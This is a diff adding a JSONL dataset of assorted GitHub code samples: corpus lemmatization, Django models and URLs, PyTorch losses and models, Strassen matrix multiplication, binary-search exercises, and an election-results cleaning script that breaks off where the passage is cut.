diff --git "a/2402.jsonl" "b/2402.jsonl" new file mode 100644--- /dev/null +++ "b/2402.jsonl" @@ -0,0 +1,1755 @@ +{"seq_id":"25112095949","text":"#!/usr/bin/python3\n#\n# ./extract filepattern output_directory\n# Example: ./dat2txt.py txt/\n#\nimport glob\nimport sys\nimport os\n\nimport re \n\ndef is_id( label ):\n # horrible, but works\n return len( label.split(\".\") ) == 4 and len( label.split(\",\") ) == 2 \n\n\ndef is_empty( label ):\n if len(label)==0:\n return True \n if label[0] == \"*\":\n return True\n if label[0] == \"0\":\n return True\n if label[0] == \"{\":\n return True\n if label[0] == \"<\":\n return True\n #if is_id(label):\n # return True\n \n return False\n\n\n#file = open(\"/home/anton/icecorpus/finished/11xx.firstgrammar.sci-lin.psd\")\n#lines = file.readlines()\n\ntagword = r\"\\(([^ \\t\\n\\r\\(\\)]+) ([^ \\t\\n\\r\\(\\)]+)\\)\"\n#allchars = 'a-zA-ZþæðöÞÆÐÖáéýúíóÁÉÝÚÍÓ\\-'\n#tagword = r'\\((['+allchars+']+) (['+allchars+']+)\\)'\n\nlemmata = {}\n\nprelemmatized = 0\nlemmatized = 0\nbad = 0\nremaining = 0\n\n\ndef extract_text( infile_path, output_directory, unknowns ):\n global prelemmatized\n global lemmatized\n global bad\n global remaining\n \n infile = open( infile_path, \"r\" )\n alltext = infile.read() \n output=\"\"\n trees = alltext.split(\"\\n\\n\")\n for tree in trees: \n lines = tree.split(\"\\n\")\n for line in lines: \n if re.search(tagword,line) != None:\n \n matches = re.findall( tagword, line )\n #print( matches )\n for match in matches:\n tag = match[0]\n word = match[1]\n lemma = \"0\" \n chunks = word.split(\"-\")\n if len(chunks) == 2:\n lemma = chunks[1]\n word = chunks[0]\n prelemmatized += 1\n elif len(chunks) == 1 and not is_empty( chunks[0] ) and not tag == \"CODE\":\n identity = word.lower()+\"_\"+tag \n if identity in lemmata.keys():\n line = line.replace(tag + \" \" + chunks[0], tag + \" \" + chunks[0]+\"-\"+lemmata[word.lower()+\"_\"+tag] )\n lemmatized += 1\n else:\n remaining += 1\n unknowns.append( chunks[0] + \"\\t\" + tag + \"\\t\" + chunks[0].replace(\"$\",\"\") )\n else:\n if not is_empty( chunks[0] ) and not tag == \"CODE\":\n print( word + \"-\" + tag + \"-\" +lemma)\n bad += 1 \n \n word = word.replace(\"\",\"-\")\n \n #if not is_empty( word ) and tag != \"ID\" and tag!=\"CODE\": \n # output += word + \"\\t\" + tag + \"\\t\" + lemma + \"\\n\" \n \n output += line + \"\\n\"\n output += \"\\n\"\n \n\n #output = output.replace(\"$ $\", \"\") \n basename = os.path.basename( infile_path ) \n basename = basename[0:-4] \n outfile = open( output_directory + basename + \".psd\", \"w\" ) \n outfile.write( output.strip() + \"\\n\\n\" )\n \n #for idx, value in enumerate(lemmata):\n # print( str(idx) + \"\\t\" + value + \" \"+ lemmata[value] )\n \n\n# get input params\nfile_matcher = sys.argv[1] # like something/*.dat\noutput_directory = sys.argv[2] # like data/\nlemmadict = sys.argv[3]\nunfile = sys.argv[4] # file to put unknowns\n\n# load lemmata\nlemmafile = open(lemmadict, \"r\")\nlines = lemmafile.readlines()\nfor line in lines:\n if ( len( line.split(\"\\t\") ) == 3 ):\n word, tag, lemma = line.split(\"\\t\")\n lemmata[ word.lower()+\"_\"+tag ] = lemma.lower().strip()\n\n# start correcting lemmata\nunknowns = []\nallfiles = glob.glob( file_matcher )\nfor file in allfiles:\n print( file )\n extract_text( file, output_directory, unknowns )\n\nprint(\"prelemmatized: \" +str(prelemmatized) )\nprint(\"lemmatized: \" +str(lemmatized) )\nprint(\"remaining: \" +str(remaining) )\nprint(\"bad: \" +str(bad) )\n\nunoutput = \"\"\nfor unknown in 
unknowns:\n unoutput += unknown + \"\\n\"\nopen(unfile,\"w\").write(unoutput)\n\nprint( \"done\" )\n","repo_name":"antonkarl/icecorpus","sub_path":"tscripts/src/lemmatizepsd.py","file_name":"lemmatizepsd.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"67"} +{"seq_id":"2769940346","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('workflow', '0017_auto_20151016_1551'),\n ('intake', '0002_typeformsubmission'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TypeformAsset',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('asset_url', models.CharField(max_length=256, null=True, blank=True)),\n ('css_report', models.ForeignKey(to='workflow.CSSCall')),\n ],\n ),\n ]\n","repo_name":"codeforamerica/vallejo-css-toolkit","sub_path":"intake/migrations/0003_typeformasset.py","file_name":"0003_typeformasset.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"9416793233","text":"#!/usr/bin/python\nimport matplotlib.pyplot as plt\nplt.style.use('seaborn-whitegrid')\nimport matplotlib.animation as animation\nimport numpy as np\nimport csv\n\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nfig.set_tight_layout(True)\naxes = plt.gca()\naxes.set_xlim([-70,70])\naxes.set_ylim([-70,70])\ndatafile = open('voronoi_3.csv', 'r')\nVorreader = csv.reader(datafile, delimiter=',')\n\ndef animate(i):\n for row in Vorreader:\n ax.clear()\n# ax.plot([-50, -50, 50, 50, -50],[-50, 50, 50, -50, -50],'b--')\n j = 1\n while j < len(row)-2:\n ax.plot([float(row[j]), float(row[j+2])], [float(row[j+1]), float(row[j+3])])\n j += 6\n ax.plot(float(row[len(row)-2]),float(row[len(row)-1]),'x')\n return\n\nani = animation.FuncAnimation(fig, animate, interval=250)\nani.save('Voronoi.gif', dpi=80, writer='imagemagick')\nplt.show()\n","repo_name":"ulrichdah/ROSBuzz-public","sub_path":"buzz_scripts/log/anim_voronoi_cells.py","file_name":"anim_voronoi_cells.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13435464999","text":"from __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\n\nclass SupConLoss(nn.Module):\n \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n def __init__(self, temperature=0.07, contrast_mode='all',\n base_temperature=1):\n super(SupConLoss, self).__init__()\n self.temperature = temperature\n self.contrast_mode = contrast_mode\n self.base_temperature = base_temperature\n\n def forward(self, features, labels=None, mask=None):\n \"\"\"Compute loss for model. If both `labels` and `mask` are None,\n it degenerates to SimCLR unsupervised loss:\n https://arxiv.org/pdf/2002.05709.pdf\n\n Args:\n features: hidden vector of shape [bsz, n_views, ...].\n labels: ground truth of shape [bsz].\n mask: contrastive mask of shape [bsz, bsz], mask_{i,j}=1 if sample j\n has the same class as sample i. 
Can be asymmetric.\n Returns:\n A loss scalar.\n \"\"\"\n device = (torch.device('cuda')\n if features.is_cuda\n else torch.device('cpu'))\n features=features.permute(2, 1, 0)\n if len(features.shape) < 3:\n raise ValueError('`features` needs to be [bsz, n_views, ...],'\n 'at least 3 dimensions are required')\n if len(features.shape) > 3:\n features = features.view(features.shape[0], features.shape[1], -1)\n\n batch_size = features.shape[0]\n if labels is not None and mask is not None:\n raise ValueError('Cannot define both `labels` and `mask`')\n elif labels is None and mask is None:\n mask = torch.eye(batch_size, dtype=torch.float32).to(device)\n elif labels is not None:\n labels = labels.contiguous().view(-1, 1)\n if labels.shape[0] != batch_size:\n raise ValueError('Num of labels does not match num of features')\n mask = torch.eq(labels, labels.T).float().to(device)\n else:\n mask = mask.float().to(device)\n\n contrast_count = features.shape[1]\n contrast_feature = torch.cat(torch.unbind(features, dim=1), dim=0)\n if self.contrast_mode == 'one':\n anchor_feature = features[:, 0]\n anchor_count = 1\n elif self.contrast_mode == 'all':\n anchor_feature = contrast_feature\n anchor_count = contrast_count\n else:\n raise ValueError('Unknown mode: {}'.format(self.contrast_mode))\n\n # compute logits\n anchor_dot_contrast = torch.div(\n torch.matmul(anchor_feature, contrast_feature.T),\n self.temperature)\n # for numerical stability\n logits_max, _ = torch.max(anchor_dot_contrast, dim=1, keepdim=True)\n logits = anchor_dot_contrast - logits_max.detach()\n\n # tile mask\n mask = mask.repeat(anchor_count, contrast_count)\n # mask-out self-contrast cases\n logits_mask = torch.scatter(\n torch.ones_like(mask),\n 1,\n torch.arange(batch_size * anchor_count).view(-1, 1).to(device),\n 0\n )\n mask = mask * logits_mask\n\n # compute log_prob\n exp_logits = torch.exp(logits) * logits_mask\n log_prob = logits - torch.log(exp_logits.sum(1, keepdim=True))\n\n # compute mean of log-likelihood over positive\n mean_log_prob_pos = (mask * log_prob).sum(1) / mask.sum(1)\n\n # loss\n loss = - (self.temperature / self.base_temperature) * mean_log_prob_pos\n loss = loss.view(anchor_count, batch_size).mean()\n\n return loss\nclass SinkhornDistance(nn.Module):\n r\"\"\"\n Given two empirical measures each with :math:`P_1` locations\n :math:`x\\in\\mathbb{R}^{D_1}` and :math:`P_2` locations :math:`y\\in\\mathbb{R}^{D_2}`,\n outputs an approximation of the regularized OT cost for point clouds.\n Args:\n eps (float): regularization coefficient\n max_iter (int): maximum number of Sinkhorn iterations\n reduction (string, optional): Specifies the reduction to apply to the output:\n 'none' | 'mean' | 'sum'. 'none': no reduction will be applied,\n 'mean': the sum of the output will be divided by the number of\n elements in the output, 'sum': the output will be summed. 
Default: 'none'\n Shape:\n - Input: :math:`(N, P_1, D_1)`, :math:`(N, P_2, D_2)`\n - Output: :math:`(N)` or :math:`()`, depending on `reduction`\n \"\"\"\n def __init__(self, eps, max_iter, reduction='none'):\n super(SinkhornDistance, self).__init__()\n self.eps = eps\n self.max_iter = max_iter\n self.reduction = reduction\n\n def forward(self, x, y):\n # The Sinkhorn algorithm takes as input three variables :\n C = self._cost_matrix(x, y) # Wasserstein cost function\n x_points = x.shape[-2]\n y_points = y.shape[-2]\n if x.dim() == 2:\n batch_size = 1\n else:\n batch_size = x.shape[0]\n\n # both marginals are fixed with equal weights\n mu = torch.empty(batch_size, x_points, dtype=torch.float,\n requires_grad=False).fill_(1.0 / x_points).squeeze().cuda()\n nu = torch.empty(batch_size, y_points, dtype=torch.float,\n requires_grad=False).fill_(1.0 / y_points).squeeze().cuda()\n u = torch.zeros_like(mu).cuda()\n v = torch.zeros_like(nu).cuda()\n # To check if algorithm terminates because of threshold\n # or max iterations reached\n actual_nits = 0\n # Stopping criterion\n thresh = 1e-1\n\n # Sinkhorn iterations\n for i in range(self.max_iter):\n u1 = u # useful to check the update\n u = self.eps * (torch.log(mu+1e-8) - torch.logsumexp(self.M(C, u, v), dim=-1)) + u\n v = self.eps * (torch.log(nu+1e-8) - torch.logsumexp(self.M(C, u, v).transpose(-2, -1), dim=-1)) + v\n err = (u - u1).abs().sum(-1).mean()\n\n actual_nits += 1\n if err.item() < thresh:\n break\n\n U, V = u, v\n # Transport plan pi = diag(a)*K*diag(b)\n pi = torch.exp(self.M(C, U, V))\n # Sinkhorn distance\n aa=pi * C\n #print(aa.shape)\n cost = torch.sum(aa, dim=(-2, -1))\n\n if self.reduction == 'mean':\n cost = cost.mean()\n elif self.reduction == 'sum':\n cost = cost.sum()\n\n return cost, pi, C\n\n def M(self, C, u, v):\n \"Modified cost for logarithmic updates\"\n \"$M_{ij} = (-c_{ij} + u_i + v_j) / \\epsilon$\"\n #print(C.get_device(),u.get_device(),v.get_device())\n return (-C + u.unsqueeze(-1) + v.unsqueeze(-2)) / self.eps\n\n @staticmethod\n def _cost_matrix(x, y, p=2):\n \"Returns the matrix of $|x_i-y_j|^p$.\"\n x_col = x.unsqueeze(-2)\n y_lin = y.unsqueeze(-3)\n C = torch.sum((torch.abs(x_col - y_lin)) ** p, -1)\n return C\n\n @staticmethod\n def ave(u, u1, tau):\n \"Barycenter subroutine, used by kinetic acceleration through extrapolation.\"\n return tau * u + (1 - tau) * u1","repo_name":"tsbiosky/PointACL","sub_path":"BYOL/util/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38136849922","text":"import torch\nfrom torch.nn.modules import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom models import base_model\n\nclass LeNetBN(base_model.HookModule):\n def __init__(self, device, name, num_classes=10):\n super(LeNetBN, self).__init__(device, name)\n self.features = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=1, stride=2),\n )\n\n self.flatten = nn.Flatten(start_dim=1)\n\n self.classifier = nn.Sequential(\n nn.Linear(64*14*14, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, num_classes)\n )\n\n def forward(self, x):\n out = self.features(x)\n out = self.flatten(out)\n out = self.classifier(out)\n return 
out\n\ndef build_lenetbn(device):\n return LeNetBN(device, 'lenetbn').to(device)\n","repo_name":"qzhong0605/pytorch_lottery","sub_path":"models/mnist/lenetbn.py","file_name":"lenetbn.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7325164904","text":"if '__file__' in globals(): # __file__ 이라는 전역 변수가 정의되어 있는지 확인\n import os, sys\n sys.path.append(os.path.join(os.path.dirname(__file__), '..')) # 현재 파일이 위치한 디렉터리의 부모 디렉터리를 모듈 검색 경로에 추가\n # -> 이로써 파이썬 명령어를 어디에서 실행하든 dezero_DJ 디렉토리의 파일들은 제대로 import할 수 있게 됨\n # 이건 현재 개발 중인 dezero_DJ 디렉토리를 import 하기위해 임시로 사용\n # Dezero가 패키지로 설치된 경우라면 DeZero패키지가 파이썬 검색 경로에 추가 => 그러면 이렇게 수동으로 할 필요없음\n # 다만 colab같은 환경때문에 사용중\n\n\nimport numpy as np\nfrom dezero_DJ import Variable\n\nx = Variable(np.array(1.0))\ny = (x + 3) ** 2\ny.backward()\nprint(y)\nprint(x.grad)\n\n\"\"\"\nvariable(16.0)\n8.0\n\"\"\"","repo_name":"absf123/baseOfDeeplearning_3","sub_path":"Step2/step23.py","file_name":"step23.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27578306782","text":"\"\"\"URL mapping for core module.\"\"\"\n\n__author__ = \"Arkadii Yakovets (arcadiy@google.com)\"\n\nfrom core import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n url(r\"^$\", views.IndexView.as_view()),\n url(r\"^feed.(?P(html|xml))$\", views.FeedView.as_view(),\n name=\"feed\"),\n url(r\"^feed/(?P.*).(?P(html|xml))$\",\n views.FeedView.as_view(), name=\"alert\"),\n url(r\"^post/$\", views.PostView.as_view(), name=\"post\"),\n url(r\"^template/(?P(area|message))/$\",\n views.AlertTemplateView.as_view(), name=\"template\"),\n url(r\"^preview/polygons$\",\n views.GeocodePolygonPreviewView.as_view(),\n name=\"geocodepreviewpolygons\"),\n]\n\n","repo_name":"CAPTools/CAPCollector","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"67"} +{"seq_id":"17459045948","text":"# -*- coding: utf-8 -*-\n# try something like\n@auth.requires_login()\ndef index():\n pagina=request.args(0) or 1\n grupoventa=request.args(1) or None\n \n if pagina <1:\n pagina=1\n \n if grupoventa:\n busqueda = db.tbl_usrventas.idgrpventa==grupoventa\n paginador, rangoinicio, rangofin =fun_paginador(pagina, busqueda)\n formulario=db(busqueda).select(limitby=(rangoinicio, rangofin))\n else:\n idventas =db(db.auth_group.role==\"Vendedores\").select(db.auth_group.id).first()\n busqueda=db.auth_membership.group_id==idventas.id\n paginador, rangoinicio, rangofin =fun_paginador(pagina, busqueda)\n formulario=db(db.auth_membership.group_id==idventas.id).select(limitby=(rangoinicio, rangofin))\n\n return dict(formulario=formulario,paginador=paginador,grupoventa=grupoventa)\n\n@auth.requires_login()\ndef grupoventas():\n formulario= db(db.tbl_grupoventas).select()\n return dict(formulario=formulario)\n\n\n\n\ndef fun_paginador(idpagina,busqueda):\n maxlinea=10\n idpagina=int(idpagina)\n cantidad= db(busqueda).count()\n lineaspags=cantidad / maxlinea\n paghtml=UL(_class=\"pagination\")\n if idpagina >1:\n paghtml.append(LI(A(XML(''), _href=URL('index',args=idpagina-1))))\n\n \n\n if lineaspags>maxlinea:\n rangofin=idpagina + maxlinea\n else:\n rangofin=lineaspags\n\n for pag in range(idpagina, rangofin):\n paghtml.append (LI(A(pag, _href=URL('index',args=pag))) )\n\n paghtml.append(LI(A(XML(''), 
_href=URL('index',args=rangofin))))\n rangoinicio=(idpagina -1) * maxlinea\n rangofin=rangoinicio + maxlinea\n return paghtml,rangoinicio,rangofin\n","repo_name":"calimacaco/redox","sub_path":"controllers/vendedores.py","file_name":"vendedores.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6717854433","text":"import numpy as np\n\n\nnum_addorsub=0\nnum_mul=0\nnum_assign=0\n\ndef matrix_add(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_c=matrix_a+matrix_b\n '''\n rows = len(matrix_a) # get numbers of rows\n columns = len(matrix_a[0]) # get numbers of cols\n matrix_c = [list() for i in range(rows)] # build matrix 2d list\n for i in range(rows):\n for j in range(columns):\n matrix_c_temp = matrix_a[i][j] + matrix_b[i][j]\n global num_addorsub,num_assign\n num_addorsub=num_addorsub+1\n num_assign = num_assign+1\n matrix_c[i].append(matrix_c_temp)\n return matrix_c\n\n\ndef matrix_minus(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_c=matrix_a-matrix_b\n '''\n rows = len(matrix_a)\n columns = len(matrix_a[0])\n matrix_c = [list() for i in range(rows)]\n for i in range(rows):\n for j in range(columns):\n matrix_c_temp = matrix_a[i][j] - matrix_b[i][j]\n global num_addorsub,num_assign\n num_addorsub = num_addorsub + 1\n num_assign=num_assign+1\n matrix_c[i].append(matrix_c_temp)\n return matrix_c\n\n\ndef matrix_divide(matrix_a, row, column):\n '''\n :param matrix_a:\n :param row:\n :param column:\n :return: matrix_b=matrix_a(row,column) to divide matrix_a\n '''\n length = len(matrix_a)\n matrix_b = [list() for i in range(length // 2)]\n k = 0\n for i in range((row - 1) * length // 2, row * length // 2):\n for j in range((column - 1) * length // 2, column * length // 2):\n matrix_c_temp = matrix_a[i][j]\n matrix_b[k].append(matrix_c_temp)\n k += 1\n return matrix_b\n\n\ndef matrix_merge(matrix_11, matrix_12, matrix_21, matrix_22):\n '''\n :param matrix_11:\n :param matrix_12:\n :param matrix_21:\n :param matrix_22:\n :return:mariix merged by 4 parts above\n '''\n length = len(matrix_11)\n matrix_all = [list() for i in range(length * 2)] # build a matrix of double rows\n for i in range(length):\n # for each row. matrix_all list contain row of matrix_11 and matrix_12\n matrix_all[i] = matrix_11[i] + matrix_12[i]\n for j in range(length):\n # for each row. matrix_all list contain row of matrix_21 and matrix_22\n matrix_all[length + j] = matrix_21[j] + matrix_22[j]\n return matrix_all\n\n\ndef strassen(matrix_a, matrix_b):\n '''\n :param matrix_a:\n :param matrix_b:\n :return:matrix_a * matrix_b\n '''\n rows = len(matrix_a)\n if rows == 1:\n matrix_all = [list() for i in range(rows)]\n matrix_all[0].append(matrix_a[0][0] * matrix_b[0][0])\n elif(rows % 2 ==1): #不能被2整除无法用 strassen,一直递归到无法被2整除,或者只剩一个元素(如上面),就用NumPy做正常的MatMul\n # 但实际用的时候应该分解到能较快计算矩阵时,矩阵能更好的利用硬件时,就可以停止,或者可以搜索得到应该停止的规模,而不一定非得是奇数或1,这又和原矩阵的形状相关的,看最终矩阵取什么值可以更少地乘2^k次方得到原矩阵\n \"\"\" 正常MatMul如下:\n C11 = A11 • B11 + A12 • B21\n C12 = A11 • B12 + A12 • B22\n C21= A21 • B11 + A22 • B21\n C22 = A21 • B12 + A22 • B22 \n \"\"\"\n matrix_a_np = np.array(matrix_a)\n matrix_b_np = np.array(matrix_b)\n matrix_all = np.dot(matrix_a_np,matrix_b_np)\n global num_mul,num_addorsub\n num_mul = num_mul + 27\n num_addorsub=num_addorsub + 18\n else:\n # 10 first parts of computing. 
由于不涉及乘法,可以直接计算\n # S1 = B12 - B22\n # S2 = A11 + A12\n # S3 = A21 + A22\n # S4 = B21 - B11\n # S5 = A11 + A22\n # S6 = B11 + B22\n # S7 = A12 - A22\n # S8 = B21 + B22\n # S9 = A11 - A21\n # S10 = B11 + B12\n s1 = matrix_minus((matrix_divide(matrix_b, 1, 2)), (matrix_divide(matrix_b, 2, 2)))\n s2 = matrix_add((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 1, 2)))\n s3 = matrix_add((matrix_divide(matrix_a, 2, 1)), (matrix_divide(matrix_a, 2, 2)))\n s4 = matrix_minus((matrix_divide(matrix_b, 2, 1)), (matrix_divide(matrix_b, 1, 1)))\n s5 = matrix_add((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 2, 2)))\n s6 = matrix_add((matrix_divide(matrix_b, 1, 1)), (matrix_divide(matrix_b, 2, 2)))\n s7 = matrix_minus((matrix_divide(matrix_a, 1, 2)), (matrix_divide(matrix_a, 2, 2)))\n s8 = matrix_add((matrix_divide(matrix_b, 2, 1)), (matrix_divide(matrix_b, 2, 2)))\n s9 = matrix_minus((matrix_divide(matrix_a, 1, 1)), (matrix_divide(matrix_a, 2, 1)))\n s10 = matrix_add((matrix_divide(matrix_b, 1, 1)), (matrix_divide(matrix_b, 1, 2)))\n # 7 second parts of computing. 由于涉及乘法,而S系列又是在上面直接计算得到,所以A和B系列需要递归用strassen计算. log_2(7) 就是由P系列的递归计算而来\n # P1 = A11 • S1\n # P2 = S2 • B22\n # P3 = S3 • B11\n # P4 = A22 • S4\n # P5 = S5 • S6\n # P6 = S7 • S8\n # P7 = S9 • S10\n p1 = strassen(matrix_divide(matrix_a, 1, 1), s1)\n p2 = strassen(s2, matrix_divide(matrix_b, 2, 2))\n p3 = strassen(s3, matrix_divide(matrix_b, 1, 1))\n p4 = strassen(matrix_divide(matrix_a, 2, 2), s4)\n p5 = strassen(s5, s6)\n p6 = strassen(s7, s8)\n p7 = strassen(s9, s10)\n # 4 final parts of result\n # C11 = P5 + P4 - P2 + P6\n # C12 = P1 + P2\n # C21 = P3 + P4\n # C22 = P5 + P1 - P3 - P7\n c11 = matrix_add(matrix_add(p5, p4), matrix_minus(p6, p2))\n c12 = matrix_add(p1, p2)\n c21 = matrix_add(p3, p4)\n c22 = matrix_minus(matrix_add(p5, p1), matrix_add(p3, p7))\n matrix_all = matrix_merge(c11, c12, c21, c22)\n global num_assign\n num_assign =num_assign+22\n return matrix_all\n\n\ndef main():\n # read data\n # A = read_matrix('matrixA.txt')\n # B = read_matrix('matrixB.txt')\n \n A_arr = np.random.rand(6, 6)\n B_arr = np.random.rand(6, 6)\n print(\"Rand Matrix A:\")\n print(A_arr)\n print(\"Rand Matrix B:\")\n print(B_arr)\n A = A_arr.tolist()\n B = B_arr.tolist()\n\n # compute A*B\n C = strassen(A,B)\n print(\"\\nResult of matrix given\\n\",np.array(C))\n\n # verificate A*B\n C_verification=np.dot(A,B)\n print(\"\\n Result of NumPy:\")\n print(C_verification)\n print(\"\\nSubtract from standard results\\n\",np.array((C-C_verification),dtype=int))\n\n # statistical data\n print(\"\\nfrequency of add/sub\",num_addorsub)\n print(\"frequency of assign\", num_assign)\n print(\"frequency of mul\", num_mul)\n \n # 下面是整数矩阵\n # new_matrixA = np.random.random_integers(-5,5,size=(8, 8))\n # print(\"\\nRandom Matrix A:\\n\", new_matrixA)\n # new_matrixB = np.random.random_integers(-5,5,size=(8, 8))\n # print(\"\\nRandom Matrix B:\\n\", new_matrixB)\n\n # AdotB=strassen(new_matrixA, new_matrixB)\n # print(\"\\n A*B Result of matrixs by generate randomly\\n\",np.array(AdotB))\n\n # BdotA = strassen(new_matrixB, new_matrixA)\n # print(\"\\n B*A Result of matrixs by generate randomly\\n\", np.array(BdotA))\n\n # result=new_matrixA\n # for i in range(0,2019):\n # result=strassen(result,new_matrixA)\n # print(\"\\n A^2019 Result of matrixs by generate randomly\\n\",np.array(result))\nif __name__ == '__main__':\n 
main()","repo_name":"butterluo/langAlg","sub_path":"py/strassen.py","file_name":"strassen.py","file_ext":"py","file_size_in_byte":7539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29345015253","text":"from typing import List\n\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n\n def searchHelper( low, high) -> int:\n i = low\n j = high\n if i <= j:\n\n m = (i + j) // 2\n if nums[m] == target:\n return m\n if nums[m] < target:\n return searchHelper(m + 1, high)\n else:\n return searchHelper(low, m - 1)\n return -1\n\n return searchHelper(0, len(nums)-1)\n\n def search2(self, nums: List[int], target: int) -> int:\n left, right = 0, len(nums) - 1\n while left <= right:\n pivot = left + (right - left) // 2\n if nums[pivot] == target:\n return pivot\n if target < nums[pivot]:\n right = pivot - 1\n else:\n left = pivot + 1\n return -1\n\nif __name__ == '__main__':\n print(Solution().search([-1,0,3,5,9,12], 13))\n","repo_name":"replcloud/interview_py","sub_path":"us/matthey/coco/algorithm/leetcode/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40606622378","text":"'''\n 请实现有重复数字的升序数组的二分查找。\n 输出在数组中第一个大于等于查找值的位置,如果数组中不存在这样的数,则输出数组长度加一\n\ninput 4,[1,2,4,4,5]\noutput 3\n'''\n\ndef upper_bound(nums,target):\n\tn=len(nums)\n\tl,r=0,n-1\n\twhile l<=r:\n\t\tmid=(l+r)//2\n\t\tif nums[mid] 1:\n print(x)\n print(lst)'''\n\n\n# In[9]:\n\n\ndf.loc[df['candidate'] == 'MARK R ROBERTS', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'MARK R ROBERTS', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'NICK CHEN', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'NICK CHEN', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'PATRICK STARNES', 'party_detailed'] = 'DEMOCRAT'\ndf.loc[df['candidate'] == 'PATRICK STARNES', 'party_simplified'] = 'DEMOCRAT'\n\ndf.loc[df['candidate'] == 'RICHARD R JACOBSON', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'RICHARD R JACOBSON', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'DAN SOUZA', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'DAN SOUZA', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'MARK KARNOWSKI', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'MARK KARNOWSKI', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'CYNTHIA HYATT', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'CYNTHIA HYATT', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'GARY LYNDON DYE', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'GARY LYNDON DYE', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'MARC W KOLLER', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'MARC W KOLLER', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'KENNY SERNACH', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'KENNY SERNACH', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'TIM E NELSON', 'party_detailed'] = 'LIBERTARIAN'\ndf.loc[df['candidate'] == 'TIM E NELSON', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'BRIAN P HALVORSEN', 'party_detailed'] = 'INDEPENDENT PARTY OF OREGON'\ndf.loc[df['candidate'] == 'BRIAN P HALVORSEN', 'party_simplified'] = 'OTHER'\n\ndf.loc[df['candidate'] == 'FRANK L 
